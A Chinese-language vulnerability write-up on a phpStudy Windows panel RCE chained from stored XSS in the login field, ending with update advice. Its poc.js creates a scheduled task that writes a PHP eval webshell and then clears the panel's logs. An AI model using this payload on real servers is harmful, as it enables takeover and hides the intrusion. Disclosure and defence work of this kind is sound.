phpstudy小皮Windows面板RCE漏洞深度解析

phpStudy是一款集成Apache、PHP、MySQL等的PHP调试环境程序包，使用方便。phpstudy小皮Windows面板V0.102及以下版本中存在一个严重的远程代码执行（RCE）漏洞，该漏洞源于存储型跨站脚本（XSS）漏洞。通过在登录用户名输入框注入XSS代码，并利用系统后台的计划任务功能，可以实现RCE。官方已发布修复版本，用户应及时更新至最新版本以防范此漏洞。

简介

phpStudy是一款集成了最新版Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer的PHP调试环境程序包。该程序包无需复杂配置，一次性安装即可使用，是一款非常便捷且高效的PHP调试工具。此外，phpStudy还提供了开发工具和开发手册，进一步增强了其实用性。

概述

phpstudy小皮面板中存在一个远程代码执行（RCE）漏洞。经分析和复现，发现此漏洞源于一个存储型的跨站脚本（XSS）漏洞。通过在系统登录用户名输入框中注入XSS代码，并结合系统后台自动添加计划任务的功能，可以实现RCE。

影响版本

此漏洞影响小皮windows面板V0.102及以下版本。官方已发布修复版本，可从以下链接下载漏洞版本：http://www.ddooo.com/softdown/224005.htm

漏洞复现

安装成功后，系统会弹出初始账号和密码：

在尝试几次错误的用户名和密码后（需要正确输入验证码），发现错误的用户名会被记录到首页的操作日志中：

进一步尝试在登录框中插入XSS代码，发现漏洞正是通过登录窗口的存储型XSS实现的。登录框未进行有效限制，且登录失败的用户名会被直接显示在小皮首页的日志中，从而可以插入任意XSS代码。结合phpstudy内置的计划任务功能，可以写入webshell实现RCE。

系统后台的计划任务功能允许执行系统命令，因此通过登录处的XSS漏洞，可以写入计划任务来执行命令。

在VPS上部署时，需要插入以下poc.js文件（写入目录根据本地实际情况进行调整）：

function poc() {
  $.get('/service/app/tasks.php?type=task_list', {}, function(data) {
    var id = data.data[0].ID;
    $.post('/service/app/tasks.php?type=exec_task', {
      tid: id
    }, function(res2) {
      $.post('/service/app/log.php?type=clearlog', {}, function(res3) {}, "json");
    }, "json");
  }, "json");
}

function save() {
  var data = new Object();
  data.task_id = "";
  data.title = "test";
  data.exec_cycle = "1";
  data.week = "1";
  data.day = "3";
  data.hour = "14";
  data.minute = "20";
  data.shell = 'echo "<?php @eval($_POST[123]);?>" >D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
  $.post('/service/app/tasks.php?type=save_shell', data, function(res) {
    poc();
  }, 'json');
}

save();

将上述代码插入登录框中，加载远程js代码：

修复方式

更新到最新版本的小皮面板，即可修复此漏洞。最新版的小皮面板已修复此漏洞。

以上就是《phpstudy小皮Windows面板RCE漏洞深度解析》的详细内容，更多关于phpStudy,RCE漏洞,XSS漏洞,小皮Windows面板,修复版本的资料请关注golang学习网公众号！